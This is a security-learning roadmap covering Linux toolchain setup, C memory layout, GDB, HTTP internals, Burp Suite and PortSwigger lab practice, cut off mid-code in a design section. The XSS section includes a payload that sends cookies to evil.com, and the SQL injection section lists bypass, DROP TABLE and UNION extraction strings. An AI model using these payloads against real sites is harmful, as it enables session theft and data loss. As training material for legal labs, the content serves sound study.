# PROJECT OBSESSION — THE COMPLETE INTERCONNECTED ROADMAP
## Every Phase, Every Concept, Every Practical Step — Wired Together

---

> **How to read this document:** Every concept taught in Phase 1 has an arrow pointing forward. Every tool introduced early reappears later in a harder context. Nothing is isolated. Read the connection callouts — they are the nervous system of this entire plan.

---

# PRE-PHASE: ENVIRONMENT ZERO
### *Before Day 1 of Month 1 — Your Machine Is Your Weapon, Configure It Once*

You will not debug your environment in Month 7. You configure it now, completely, and never touch it again unless something breaks.

---

## 1. Operating System Foundation

You are working on **Ubuntu 22.04 LTS** — both locally and on your DigitalOcean VPS. This is non-negotiable. The kernel module you write in Phase 4 targets the Linux kernel. Every `strace`, `ltrace`, and `GDB` session runs on Linux. macOS is a development toy for this roadmap. Windows does not exist.

**If you're on Windows, install WSL2 with Ubuntu 22.04 immediately (run this in an administrator PowerShell, not inside bash):**
```bash
wsl --install -d Ubuntu-22.04
```

**If you're on macOS, run a local Ubuntu VM via UTM or VirtualBox.**

The reason this matters: In Phase 3, you will analyze ELF binaries. ELF (Executable and Linkable Format) is the Linux executable format. On macOS, binaries are Mach-O. On Windows, they are PE. If your local environment doesn't match your target, your mental model will fracture every time you switch contexts.
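The format difference is visible in the first few bytes of any executable. A minimal sketch, assuming you only need to tell the three families apart by their magic numbers (`identify_format` and the sample header bytes are illustrative names, not part of any tool in this roadmap):

```python
# Magic numbers are standard; the function name and sample input are illustrative.
MAGICS = [
    (b"\x7fELF", "ELF (Linux)"),
    (b"MZ", "PE (Windows)"),
    (b"\xcf\xfa\xed\xfe", "Mach-O 64-bit (macOS)"),
    (b"\xce\xfa\xed\xfe", "Mach-O 32-bit (macOS)"),
    # CA FE BA BE is also used by Java class files, so treat this one as a hint only.
    (b"\xca\xfe\xba\xbe", "Mach-O universal (macOS)"),
]


def identify_format(header: bytes) -> str:
    """Return the executable format implied by the first bytes of a file."""
    for magic, name in MAGICS:
        if header.startswith(magic):
            return name
    return "unknown"


# Hypothetical first bytes of a 64-bit little-endian ELF file.
print(identify_format(b"\x7fELF\x02\x01\x01\x00"))
```

To try it on a real file, read the first four bytes with `open(path, "rb").read(4)` and pass them in.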

---

## 2. The Complete Toolchain Install — One Session

Run this once. Understand what each line installs and *why*:

```bash
# Core build tools
sudo apt update && sudo apt upgrade -y
sudo apt install -y build-essential gcc gdb make cmake

# Why build-essential? It installs gcc, g++, make, and the C standard library headers.
# Why separately install gdb? You will live in GDB. Know you installed it intentionally.

# Network inspection tools
sudo apt install -y wireshark tcpdump netcat-openbsd nmap curl wget

# Why wireshark? Phase 1: You will capture your own C HTTP server's TCP handshake.
# Why netcat? Phase 1: You will manually send raw HTTP requests to your server.
# Why nmap? Phase 3: Your Go recon tool will replicate what nmap does — you must
#            understand the tool before you automate it.

# Assembly toolchain
sudo apt install -y nasm binutils

# Why nasm? Intel syntax assembler. You will write shellcode in Phase 3.
# Why binutils? Provides objdump, readelf, nm — binary analysis tools.

# Memory debugging
sudo apt install -y valgrind

# Why valgrind? Phase 1: Run every C program through valgrind before your Python 
#               fuzzer touches it. Valgrind finds memory errors with surgical precision.
#               Your fuzzer finds crashes by brute force. Together they are complete.

# Python environment
sudo apt install -y python3 python3-pip python3-venv
pip3 install requests pwntools scapy

# Why pwntools now? You won't use it until Phase 3 but installing it early means
#                   you'll read its documentation passively and absorb its model.

# Go installation (always install from official binary, not apt)
wget https://go.dev/dl/go1.22.0.linux-amd64.tar.gz   # Releases since Go 1.21 carry the ".0" patch number
sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf go1.22.0.linux-amd64.tar.gz
echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc
source ~/.bashrc
go version

# Node.js via nvm (Node Version Manager)
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.7/install.sh | bash
source ~/.bashrc
nvm install 20
nvm use 20
npm install -g typescript

# Docker (Phase 4 deployment, install now, use later)
curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh get-docker.sh
sudo usermod -aG docker $USER   # Log out and back in before the group change takes effect
```

---

## 3. GDB Configuration — Do This Now

Create `~/.gdbinit`:
```
set disassembly-flavor intel
set pagination off
set print pretty on
```

**Why `intel` flavor?** AT&T syntax writes `movq %rax, %rbx`. Intel syntax writes `mov rbx, rax`. Intel syntax is destination-first, which is how you will write NASM assembly. If GDB speaks AT&T and you think in Intel, you will spend cognitive energy on translation instead of analysis. Eliminate the friction before it costs you.

---

## 4. Your Project File Structure — From Day 1

```
~/obsession/
├── phase1/
│   ├── c_utilities/        # grep clone, cat clone
│   ├── http_server/        # The Phase 1 capstone C server
│   ├── fuzzer/             # Python fuzzer for your own server
│   ├── design/             # Figma exports, Next.js static sites
│   └── DEVLOG.md           # Daily written output — mandatory
├── phase2/
│   ├── securedrop/         # The E2E encrypted file vault
│   ├── api/                # Go + Chi router + PostgreSQL + Redis
│   └── DEVLOG.md
├── phase3/
│   ├── reverse/            # Ghidra projects, crackmes
│   ├── vigilante/          # The Go fuzzer capstone
│   ├── shellcode/          # NASM shellcode experiments
│   └── DEVLOG.md
├── phase4/
│   ├── lkm/                # Linux Kernel Module
│   ├── saas/               # The live SaaS deployment
│   ├── bounty/             # HackerOne recon notes, report drafts
│   └── DEVLOG.md
└── resources/
    ├── books/              # PDF references
    ├── wordlists/          # SecLists for Phase 3 fuzzer
    └── notes/              # Concept breakdowns (Feynman technique)
```

Initialize git from Day 1:
```bash
mkdir -p ~/obsession && cd ~/obsession
git init
echo "# PROJECT OBSESSION" > README.md
git add . && git commit -m "init: project structure initialized"
```

**The DEVLOG.md discipline:** Every single deep work block ends with a written entry. Minimum 150 words. Format:

```markdown
## DEVLOG — [DATE] — Phase [X], Week [Y]

**What I worked on:**
**What I actually understood:**
**What confused me:**
**How it connects to what I learned before:**
**Tomorrow's first task:**
```

The last field — *how it connects* — is where this roadmap is internalized.

---
---

# PHASE 1: MONTHS 1–3 — THE DIGITAL BEDROCK
## *The Compiler, The Protocol, The Pixel*

---

## THE CENTRAL THESIS OF PHASE 1

> **Everything a computer does is memory manipulation over a network.** A web application is bytes moving through a TCP socket into a heap-allocated buffer, rendered by a DOM parser. An SQL injection is a string that escapes one context and executes in another. A buffer overflow is a string that escapes its allocated memory and writes into a return address. The underlying mechanism is identical. Phase 1 makes this unification real in your hands.

---

## WEEK-BY-WEEK BREAKDOWN

---

### MONTH 1, WEEK 1–2: THE COMPILATION PIPELINE
**Source:** CS:APP Chapter 1

#### The Concept Chain You Must Build

Most developers treat compilation as a black box: write code → run program. You will never do this. Here is the exact mental model:

```
Source Code (.c)
      ↓  [Preprocessor — cpp]
Preprocessed Source (.i)   ← #include and #define expanded
      ↓  [Compiler — cc1]
Assembly Code (.s)         ← C translated to x86_64 ASM
      ↓  [Assembler — as]
Object File (.o)           ← ASM translated to machine code (ELF relocatable)
      ↓  [Linker — ld]
Executable (ELF binary)    ← Object files + libraries combined
```

**Practical walkthrough — see every stage yourself:**

```bash
# Write the simplest possible C program
cat > hello.c << 'EOF'
#include <stdio.h>
int main() {
    printf("hello\n");
    return 0;
}
EOF

# Stop after preprocessing — see what #include actually does
gcc -E hello.c -o hello.i
wc -l hello.i          # It was 5 lines. Now it's 700+. Where did that come from?
head -50 hello.i        # Read the expanded stdio.h declarations

# Stop after compilation — see the assembly GCC generates
gcc -S -O0 hello.c -o hello.s   # -O0 = no optimization, raw output
cat hello.s                      # Read every line. You will recognize this later.

# Stop after assembly — inspect the object file
gcc -c hello.c -o hello.o
file hello.o              # "ELF 64-bit LSB relocatable"
objdump -d hello.o        # Disassemble. The machine code is here.
readelf -s hello.o        # Symbol table: puts is UND (undefined). GCC rewrote printf("hello\n") as puts("hello").

# Final link
gcc hello.o -o hello
readelf -s hello          # puts is still UND, now tagged with a GLIBC version: the dynamic linker binds it to libc at run time
./hello
```
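What `file` reported for `hello.o` comes from the `e_type` field of the ELF header. A hedged sketch of reading that field by hand (the helper name `elf_type` is hypothetical; the offsets follow the ELF header layout, where `e_ident` occupies the first 16 bytes and `e_type` is the 16-bit value right after it):

```python
import os
import struct

ELF_TYPES = {
    1: "ET_REL (relocatable object)",
    2: "ET_EXEC (fixed-address executable)",
    3: "ET_DYN (shared object or PIE executable)",
    4: "ET_CORE (core dump)",
}


def elf_type(header: bytes) -> str:
    """Decode e_type from the first 18 bytes of an ELF file."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # e_ident[5] is EI_DATA: 1 means little-endian, 2 means big-endian.
    endian = "<" if header[5] == 1 else ">"
    (e_type,) = struct.unpack_from(endian + "H", header, 16)
    return ELF_TYPES.get(e_type, f"unknown ({e_type})")


# Only runs if you are in the directory where you built hello.o and hello.
for path in ("hello.o", "hello"):
    if os.path.exists(path):
        with open(path, "rb") as f:
            print(path, "->", elf_type(f.read(18)))
```

On Ubuntu 22.04, where GCC builds position-independent executables by default, `hello.o` should report ET_REL and `hello` should report ET_DYN rather than ET_EXEC.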

**Why this matters for security (Phase 3 forward-connection):**
When you reverse engineer a binary in Ghidra in Month 7, you are reading the output of the linker. When you analyze a buffer overflow in GDB, you are reading the stack frame that the compiler constructed. The compilation pipeline is not academic — it is the anatomy of everything you will exploit.

---

### MONTH 1, WEEK 2–3: MEMORY LAYOUT — THE MOST IMPORTANT MODEL IN THIS ROADMAP

This is the single concept that everything else builds on. Learn it until you can draw it from memory.

```
HIGH ADDRESS (0xFFFFFFFFFFFFFFFF)
┌─────────────────────────────┐
│         Kernel Space        │  ← You cannot touch this (without the LKM in Phase 4)
├─────────────────────────────┤
│           Stack             │  ← Grows DOWNWARD
│    [local vars, ret addrs]  │
│              ↓              │
│                             │
│              ↑              │
│    [malloc'd memory]        │
│           Heap              │  ← Grows UPWARD
├─────────────────────────────┤
│           BSS               │  ← Uninitialized global/static vars (zeroed at startup)
├─────────────────────────────┤
│           Data              │  ← Initialized global/static vars
├─────────────────────────────┤
│           Text              │  ← Your compiled code (read-only)
└─────────────────────────────┘
LOW ADDRESS (0x0000000000000000)
```

**Practical walkthrough — print real addresses:**

```c
// memory_map.c
#include <stdio.h>
#include <stdlib.h>

int global_initialized = 42;        // DATA segment
int global_uninitialized;           // BSS segment

void function_on_stack() {
    int local = 0;                  // STACK
    printf("Stack variable:       %p\n", (void*)&local);
}

int main() {
    int stack_var = 1;
    void *heap_ptr = malloc(64);    // HEAP

    printf("Text (main func):     %p\n", (void*)main);
    printf("Data (global init):   %p\n", (void*)&global_initialized);
    printf("BSS  (global uninit): %p\n", (void*)&global_uninitialized);
    printf("Heap (malloc):        %p\n", heap_ptr);
    printf("Stack (local var):    %p\n", (void*)&stack_var);
    
    function_on_stack();
    free(heap_ptr);
    return 0;
}
```

```bash
gcc -o memory_map memory_map.c
./memory_map
```

Run this. Look at the actual hex addresses. Observe:
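- Text segment is at the lowest address of the five
- Data and BSS sit just above Text, and the heap address is above them
- Stack address is near the top of user space
- The local variable inside `function_on_stack()` is at a *lower* address than `stack_var` in `main()`: the callee's frame sits below the caller's, so the stack is growing downward in real time
- Ubuntu builds position-independent executables and randomizes addresses (ASLR) by default, so the absolute values change from run to run; the relative ordering is what matters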

**Forward connection to Phase 3:** When you trigger a stack buffer overflow in a Nightmare CTF challenge, you will be overwriting memory from a low stack address upward toward the return address. You need this diagram burned into your memory first.
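The kernel publishes the same layout for every running process in `/proc/<pid>/maps`. A small sketch, assuming a Linux host (`parse_maps_line` is an illustrative helper, not a standard function), that parses one line of that file so you can compare the `[heap]` and `[stack]` ranges with the addresses `memory_map` printed:

```python
import os


def parse_maps_line(line: str):
    """Split one /proc/<pid>/maps line into (start, end, perms, name)."""
    # Format: address-range perms offset dev inode [pathname]
    fields = line.split(maxsplit=5)
    start, end = (int(part, 16) for part in fields[0].split("-"))
    perms = fields[1]
    name = fields[5].strip() if len(fields) > 5 else ""
    return start, end, perms, name


# Show this Python process's own heap and stack, if the file exists (Linux only).
if os.path.exists("/proc/self/maps"):
    with open("/proc/self/maps") as maps:
        for line in maps:
            start, end, perms, name = parse_maps_line(line)
            if name in ("[heap]", "[stack]"):
                print(f"{name:8} {start:#018x}-{end:#018x} {perms}")
```

For a C program, run it under GDB, stop at a breakpoint, and read `/proc/<pid>/maps` from another terminal to see the same regions.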

---

### MONTH 1, WEEK 3–4: C PROGRAMMING — MANUAL MEMORY MANAGEMENT

**Why C before everything else:**
TypeScript, Go, and Python all hide memory from you behind a garbage collector or automatic memory manager. C does not. When you call `malloc()` in C, the allocator hands you a region of heap that it obtained from the kernel through `brk()` or `mmap()`, which are actual Linux system calls. When you free it, you are telling the heap allocator to reclaim that region. When you forget, you have a memory leak. When you write past the end, you have undefined behavior, and undefined behavior is the source of every buffer overflow exploit you will study.

**The `grep` clone — practical walkthrough:**

Build this incrementally. Do not look up implementations. Solve each problem yourself:

```
Week 3 Target: grep v0.1
─────────────────────────
□ Accept two arguments: pattern and filename
□ Open the file with fopen()
□ Read line by line with fgets() into a fixed-size buffer
□ Use strstr() to search for the pattern in each line
□ Print matching lines to stdout
□ Close the file, return 0

Week 4 Target: grep v0.2
─────────────────────────
□ Handle the case where the file doesn't exist (errno + perror)
□ Handle the case where no arguments are provided
□ Support reading from stdin when no filename is given (like real grep)
□ Eliminate the fixed buffer — use dynamic allocation with malloc/realloc
```

**The malloc discipline:**

```c
// Every malloc follows this exact pattern. No exceptions.
char *buffer = malloc(size);
if (buffer == NULL) {
    fprintf(stderr, "malloc failed\n");
    exit(EXIT_FAILURE);  // or return error code
}
// ... use buffer ...
free(buffer);
buffer = NULL;  // A stale use through this pointer now crashes at once, and a second free() is harmless. Always do this.
```

**Valgrind discipline — run this after every C build:**

```bash
gcc -g -o mygrep mygrep.c    # -g flag includes debug symbols for valgrind
valgrind --leak-check=full --track-origins=yes ./mygrep "hello" test.txt
```

Valgrind output you need to be able to read:
```
==12345== HEAP SUMMARY:
==12345==     in use at exit: 0 bytes in 0 blocks  ← GOOD. No leaks.
==12345==   total heap usage: 3 allocs, 3 frees     ← allocs == frees. Correct.

# BAD output looks like:
==12345== Invalid write of size 1                   ← You wrote past your allocation
==12345==  at 0x401234: read_line (mygrep.c:47)
==12345== definitely lost: 64 bytes in 1 blocks     ← Memory leak
```

**Do not proceed to the next section until valgrind reports zero errors on both your `grep` and `cat` clones.**

---

### GDB — YOUR PRIMARY DEBUGGING INSTRUMENT

GDB is not a tool you use when things break. GDB is how you *read programs*. You will use GDB daily from this week until Month 12.

**The mandatory GDB command set — master these before anything else:**

```bash
gdb ./mygrep                    # Load program

# Inside GDB:
(gdb) break main                # Set breakpoint at main()
(gdb) break mygrep.c:47        # Set breakpoint at line 47
(gdb) run "hello" test.txt     # Run with arguments
(gdb) next                     # Execute next line (step OVER function calls)
(gdb) step                     # Execute next line (step INTO function calls)
(gdb) continue                 # Continue to next breakpoint

# Inspect memory:
(gdb) print buffer             # Print variable value
(gdb) print &buffer            # Print variable address
(gdb) x/16xb buffer           # Examine 16 bytes at buffer address in hex
(gdb) x/s buffer               # Examine as string
(gdb) x/4gx $rsp              # Examine 4 quadwords at stack pointer

# Inspect registers:
(gdb) info registers           # All registers
(gdb) print $rax               # Specific register
(gdb) print $rip               # Instruction pointer — where are you?

# Inspect stack frames:
(gdb) backtrace                # Full call stack
(gdb) frame 2                  # Switch to frame 2
(gdb) info locals              # Local variables in current frame
```
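The `b` and `g` unit letters in `x/16xb` and `x/4gx` show the same memory at different granularity, and x86_64 is little-endian, so the byte order looks reversed between the two views. A sketch with eight made-up bytes (the value is hypothetical, chosen to resemble a code address):

```python
import struct

# Hypothetical 8 bytes as they sit in memory, lowest address first.
raw = bytes([0x16, 0x52, 0x55, 0x55, 0x55, 0x55, 0x00, 0x00])

# Byte view, the way x/8xb prints memory.
print(" ".join(f"0x{b:02x}" for b in raw))

# Giant-word view, the way x/1gx prints the same memory.
(qword,) = struct.unpack("<Q", raw)  # "<Q" = little-endian unsigned 64-bit
print(f"0x{qword:016x}")
```

When a saved return address on the stack looks backwards in a byte dump, this is why.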

**Practical GDB walkthrough — watch a stack frame build:**

```c
// stack_demo.c
#include <stdio.h>

int add(int a, int b) {
    int result = a + b;     // Set a breakpoint here
    return result;
}

int main() {
    int x = 10;
    int y = 20;
    int z = add(x, y);     // Set a breakpoint here too
    printf("z = %d\n", z);
    return 0;
}
```

```bash
gcc -g -o stack_demo stack_demo.c
gdb ./stack_demo
(gdb) break add
(gdb) run
(gdb) info registers          # Look at RSP (stack pointer) and RBP (base pointer)
(gdb) x/16gx $rsp             # What's on the stack right now?
(gdb) backtrace               # main called add. You can see both frames.
(gdb) frame 1                 # Switch to main's frame
(gdb) info locals             # x=10, y=20, z=<garbage> (uninitialized until add returns)
```

Draw what you see. Map the register values to the memory layout diagram you built earlier. This is the Feynman technique in action — you don't understand the stack until you can draw it from a live GDB session.

---

### MONTH 2, WEEK 1–2: WEB PROTOCOLS — THE NETWORK LAYER

**The connection to Phase 1 C work:**
Your C server will speak HTTP over TCP. Before you write a single line of server code, you need to know exactly what HTTP looks like at the byte level. Not abstractly. At the byte level.

#### TCP/IP — The Transport Foundation

```
TCP Three-Way Handshake:

Client                          Server
  │                               │
  │──────── SYN ──────────────────▶│  "I want to connect, my seq# is X"
  │                               │
  │◀─────── SYN-ACK ──────────────│  "OK, my seq# is Y, I acknowledge X+1"
  │                               │
  │──────── ACK ──────────────────▶│  "I acknowledge Y+1. Connection open."
  │                               │
  │  [HTTP request/response now]  │
  │                               │
  │──────── FIN ──────────────────▶│  "I'm done sending"
  │◀─────── FIN-ACK ──────────────│
  │──────── ACK ──────────────────▶│  Connection closed.
```
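The sequence and acknowledgment arithmetic in the diagram can be sketched as a tiny model. This is an illustration only, with made-up initial sequence numbers; `three_way_handshake` is a hypothetical helper and no packets are sent:

```python
SEQ_MOD = 2**32  # TCP sequence numbers are 32-bit and wrap around


def three_way_handshake(client_isn: int, server_isn: int):
    """Return the three handshake segments as plain dictionaries."""
    return [
        {"from": "client", "flags": "SYN", "seq": client_isn, "ack": None},
        {"from": "server", "flags": "SYN-ACK", "seq": server_isn,
         "ack": (client_isn + 1) % SEQ_MOD},
        {"from": "client", "flags": "ACK", "seq": (client_isn + 1) % SEQ_MOD,
         "ack": (server_isn + 1) % SEQ_MOD},
    ]


# X = 1000 and Y = 5000 are arbitrary example values.
for segment in three_way_handshake(1000, 5000):
    print(segment)
```

Compare the printed numbers with a capture taken using `tcpdump -S`, which shows absolute rather than relative sequence numbers.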

**Practical walkthrough — capture and read this handshake yourself:**

```bash
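# Terminal 1: Start the capture first, so the handshake is not missed
sudo tcpdump -i lo -A port 8080

# Terminal 2: Start a basic netcat server
nc -lvp 8080

# Terminal 3: Connect with curl and watch what happens
# (netcat never answers, so curl will wait; press Ctrl-C once you have seen the request)
curl http://localhost:8080/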

Alternatively, open Wireshark, start capturing on `lo` (loopback), then run curl. Filter by `tcp.port == 8080`. The packet list shows the SYN, SYN-ACK, and ACK of the handshake as separate rows. Right-click any packet of the connection → Follow → TCP Stream to read the payload of the whole conversation: the raw HTTP request bytes and the response bytes.

#### HTTP/1.1 — What an HTTP Request Actually Is

This is a raw HTTP/1.1 GET request at the byte level:

```
GET /index.html HTTP/1.1\r\n
Host: localhost:8080\r\n
User-Agent: curl/7.88.1\r\n
Accept: */*\r\n
\r\n
```

That `\r\n` (carriage return + line feed) is not decorative. It is how HTTP delimits headers. A blank line (`\r\n\r\n`) signals the end of headers and the start of the body (for POST requests). **This is where HTTP parsing vulnerabilities come from.** HTTP Request Smuggling (an advanced PortSwigger topic) exploits cases where two HTTP implementations handling the same connection disagree about where one request ends and the next begins.
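To make the delimiters concrete, here is a minimal sketch of splitting a raw request on them. It assumes a well-formed request and is not a hardened parser; `parse_request` is an illustrative name:

```python
def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into its parts using the CRLF delimiters."""
    # The first blank line (CRLF CRLF) separates the head from the body.
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    # Request line: METHOD SP TARGET SP VERSION
    method, target, version = lines[0].decode("ascii").split(" ")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, version, headers, body


raw = (b"GET /index.html HTTP/1.1\r\n"
       b"Host: localhost:8080\r\n"
       b"User-Agent: curl/7.88.1\r\n"
       b"Accept: */*\r\n"
       b"\r\n")
print(parse_request(raw))
```

Every shortcut here (trusting exactly two spaces in the request line, letting a repeated header overwrite the first) is a decision another parser might make differently, which is the raw material for the parsing bugs mentioned above.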

**Send a raw HTTP request manually with netcat:**

```bash
# Start your own server (Python's for now, yours in C later)
python3 -m http.server 8080

# In another terminal — type an HTTP request by hand:
printf "GET / HTTP/1.1\r\nHost: localhost:8080\r\n\r\n" | nc localhost 8080
```

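You will see the server's raw HTTP response: status line, headers, blank line, body. (Python's `http.server` puts `HTTP/1.0` in its status line by default, even when the request says `HTTP/1.1`.) Every web framework in existence, including Next.js, Django, Rails, and Go's `net/http`, is parsing exactly this format.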

**Forward connection to Phase 1 security:** When you practice XSS on PortSwigger, you are injecting payloads into HTTP request parameters. Burp Suite intercepts and modifies exactly these raw bytes. Understanding HTTP at this level makes Burp Suite intuitive rather than magical.

---

### MONTH 2, WEEK 2–4: BURP SUITE — THE WEB SECURITY INSTRUMENT

Burp Suite is a proxy. It sits between your browser and the target:

```
Browser ──▶ Burp Suite (localhost:8080) ──▶ Target Server
Browser ◀── Burp Suite                  ◀── Target Server
```

Every request passes through Burp. You can intercept, modify, replay, and fuzz it.

**Initial setup:**
1. Open Burp Suite Community Edition
2. Go to Proxy → Options (called Proxy settings in newer releases) → confirm listener is `127.0.0.1:8080`
3. Configure Firefox: Settings → Network Settings → Manual Proxy → HTTP Proxy: `127.0.0.1`, Port: `8080`
4. Install Burp's CA certificate in Firefox (download it from `http://burpsuite` while proxied), or skip steps 3 and 4 by using Burp's built-in browser (Proxy → Intercept → Open Browser)

**The four tools you need to master in Phase 1:**

| Tool | What It Does | When You Use It |
|---|---|---|
| **Proxy/Intercept** | Catch and modify requests in real time | Whenever you want to change a parameter before it hits the server |
| **Repeater** | Replay a captured request with modifications | Manually testing a single endpoint repeatedly |
| **Intruder** | Automated payload injection into marked positions | Fuzzing parameters with wordlists (SQLi payloads, XSS vectors) |
| **Decoder** | Encode/decode Base64, URL, HTML, Hex | When you see an obfuscated parameter and need to read it |
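What Decoder does is not special to Burp. A short sketch of the same four decodings with Python's standard library (the sample strings are made up for illustration):

```python
import base64
import html
import urllib.parse

# Base64, as seen in Basic auth headers and many cookies
b64_plain = base64.b64decode("YWRtaW46cGFzc3dvcmQ=").decode()

# URL (percent) encoding, as seen in query strings
url_plain = urllib.parse.unquote("%3Cscript%3E")

# HTML entities, as seen in reflected output
html_plain = html.unescape("&lt;b&gt;")

# Hex, as seen in tokens and binary dumps
hex_plain = bytes.fromhex("47455420").decode()

print(b64_plain, url_plain, html_plain, repr(hex_plain))
```

Knowing these by hand helps when a parameter is encoded twice, for example URL encoding wrapped around Base64.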

---

### MONTH 2, WEEK 3 — MONTH 3, WEEK 2: PORTSWIGGER LABS — PRACTICAL ATTACK WALKTHROUGH

Do not approach these as puzzles to be solved quickly. Approach them as **mechanisms to be understood completely.**

**For every lab, follow this protocol:**
1. Read the lab description — what vulnerability class?
2. Before opening Burp: what is the *theoretical mechanism* of this attack?
3. Open Burp, map the application's traffic manually first
4. Attempt the exploit
5. After success: write a 200-word DEVLOG entry explaining *why* it worked

#### XSS — Cross-Site Scripting: The Mechanism

XSS is not "inject `<script>alert(1)</script>`." That is the symptom. The mechanism is:

**User-supplied input is inserted into an HTML document without sanitization, causing the browser's HTML parser to interpret it as executable code rather than data.**

```
Vulnerable template:
<p>Welcome, [USERNAME]!</p>

Attacker input:
USERNAME = <script>document.location='https://evil.com/?c='+document.cookie</script>

Rendered HTML:
<p>Welcome, <script>document.location='https://evil.com/?c='+document.cookie</script>!</p>

Result: Browser executes attacker's JavaScript. Session cookie exfiltrated.
```

**The three XSS contexts — each requires different payloads:**

```html
<!-- Context 1: HTML body — direct tag injection -->
<div>[INJECTION]</div>
Payload: <img src=x onerror=alert(1)>

<!-- Context 2: HTML attribute — break out of attribute -->
<input value="[INJECTION]">
Payload: " onmouseover="alert(1)
Result: <input value="" onmouseover="alert(1)">

<!-- Context 3: JavaScript string — break out of string context -->
<script>var x = '[INJECTION]';</script>
Payload: ';alert(1);//
Result: <script>var x = '';alert(1);//';</script>
```

**The sanitization bypass mindset:** Developers know about `<script>`. They filter it. So you use `<img>`, `<svg>`, `<body>`, `<iframe>`, `<details>`. They filter `onerror`. You use `onload`, `onfocus`, `onblur`. They filter `alert`. You use `prompt`, `confirm`, `console.log`. Every filter is a list. Every list has omissions.
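Because every blocklist has omissions, the defensive counterpart is to encode output for the context it lands in rather than to filter input. A minimal sketch for Contexts 1 and 2, assuming a Python backend (`render_welcome` and `render_input` are hypothetical helpers):

```python
import html


def render_welcome(username: str) -> str:
    """Context 1: HTML body. Angle brackets become entities, so no tag is created."""
    return f"<p>Welcome, {html.escape(username, quote=True)}!</p>"


def render_input(value: str) -> str:
    """Context 2: quoted attribute. Quotes become entities, so the attribute cannot be closed."""
    return f'<input value="{html.escape(value, quote=True)}">'


print(render_welcome("<script>alert(1)</script>"))
print(render_input('" onmouseover="alert(1)'))
```

This does not cover Context 3: inside a `<script>` block, HTML escaping is the wrong tool, and the value needs JavaScript-aware encoding instead.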

#### SQL Injection — The Mechanism

**The mechanism:** User-supplied input is concatenated into a SQL query string without parameterization, causing the database to interpret attacker data as SQL syntax.

```python
# Vulnerable code pattern (any language):
query = "SELECT * FROM users WHERE username = '" + username + "'"

# Normal input: username = "alice"
# Query: SELECT * FROM users WHERE username = 'alice'

# Attacker input: username = "' OR '1'='1"
# Query: SELECT * FROM users WHERE username = '' OR '1'='1'
# Result: Returns ALL users. Authentication bypassed.

# Attacker input: username = "'; DROP TABLE users;--"
# Query: SELECT * FROM users WHERE username = ''; DROP TABLE users;--'
# Result: users table deleted (on drivers that allow several statements per call).
```

**The correct fix (parameterized queries):**
```python
# Safe — parameter is never interpreted as SQL syntax
cursor.execute("SELECT * FROM users WHERE username = %s", (username,))
```

**Why you must understand the fix:** In Phase 2, you will write a PostgreSQL backend in Go. You will use parameterized queries by default. You will know *why* you're doing it, not just that you should.
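You can watch both behaviors side by side without setting up PostgreSQL. A sketch using Python's built-in `sqlite3` module with an in-memory database; the table contents are invented, and note that `sqlite3` uses `?` as its placeholder where the driver above uses `%s`:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)",
                 [("alice", "pw1"), ("bob", "pw2")])

payload = "' OR '1'='1"

# Vulnerable: the payload becomes part of the SQL text.
vulnerable_sql = "SELECT username FROM users WHERE username = '" + payload + "'"
leaked = conn.execute(vulnerable_sql).fetchall()

# Safe: the payload is bound as a value and only ever compared as a string.
safe = conn.execute("SELECT username FROM users WHERE username = ?",
                    (payload,)).fetchall()

print("concatenated:", leaked)
print("parameterized:", safe)
```

The concatenated query returns every row; the parameterized one returns none, because no user is literally named `' OR '1'='1`.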

**Practical PortSwigger SQLi walkthrough — Lab: "SQL injection UNION attack":**

The UNION technique extracts data from other database tables:
```sql
-- Determine number of columns first:
' ORDER BY 1--    (no error)
' ORDER BY 2--    (no error)
' ORDER BY 3--    (error: only 2 columns)

-- Find which column accepts strings:
' UNION SELECT NULL,'a'--

-- Extract data:
' UNION SELECT username, password FROM users--
```

In Burp Repeater, you send each of these payloads manually, observe the response, and iterate. This workflow — hypothesis → payload → observe → refine — is the core mental loop of web security research.
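The same hypothesis, payload, observe, refine loop can be rehearsed offline. A sketch against a deliberately vulnerable function backed by in-memory SQLite; the tables, rows, and the `search` and `count_columns` helpers are all invented for illustration, and error behavior differs between database engines:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE products (name TEXT, category TEXT);
    CREATE TABLE users (username TEXT, password TEXT);
    INSERT INTO products VALUES ('Umbrella', 'Gifts');
    INSERT INTO users VALUES ('administrator', 'hunter2');
""")


def search(category: str):
    """Deliberately vulnerable: concatenates input into the query."""
    sql = "SELECT name, category FROM products WHERE category = '" + category + "'"
    return conn.execute(sql).fetchall()


def count_columns(limit: int = 10) -> int:
    """Raise the ORDER BY index until the database rejects it."""
    for n in range(1, limit + 1):
        try:
            search(f"' ORDER BY {n}--")
        except sqlite3.OperationalError:
            return n - 1
    return limit


print("columns:", count_columns())
print("rows:", search("' UNION SELECT username, password FROM users--"))
```

Against a real lab the observation step is an HTTP response rather than a Python exception, but the reasoning is identical.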

---

### MONTH 2 — DESIGN: FIGMA AND THE 8PX GRID

**Why design is in this roadmap:** The Phase 4 SaaS capstone goes live. A technically flawless system with an unusable UI gets no users and fails as a bug bounty target surface. Design fluency makes your output indistinguishable from a funded startup.

**The 8px grid system:**

Every spacing and sizing decision is a multiple of 8, with 4px allowed as a half step for micro spacing:
```
4px  — micro spacing (icon padding, tag gaps)
8px  — base unit (small component padding)
16px — standard spacing (between elements in a component)
24px — medium spacing (between components)
32px — large spacing (section padding)
48px — XL spacing (between major sections)
64px — XXL (hero sections, page-level rhythm)
```

**Typography scale (modular scale, ratio 1.25 from the 16px base, rounded to the 4px grid; 14px is an off-scale extra for secondary text):**
```
12px — captions, labels
14px — secondary text, helper text
16px — body (base)
20px — body large / subheadings
24px — h3
32px — h2
40px — h1
```
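The sizes above follow from the ratio once each step is snapped to the 4px grid. A short sketch of that arithmetic, assuming round-to-nearest snapping (`modular_scale` is an illustrative helper, and the snapping rule is an assumption rather than something Figma enforces):

```python
def modular_scale(base=16, ratio=1.25, steps=range(-1, 5), grid=4):
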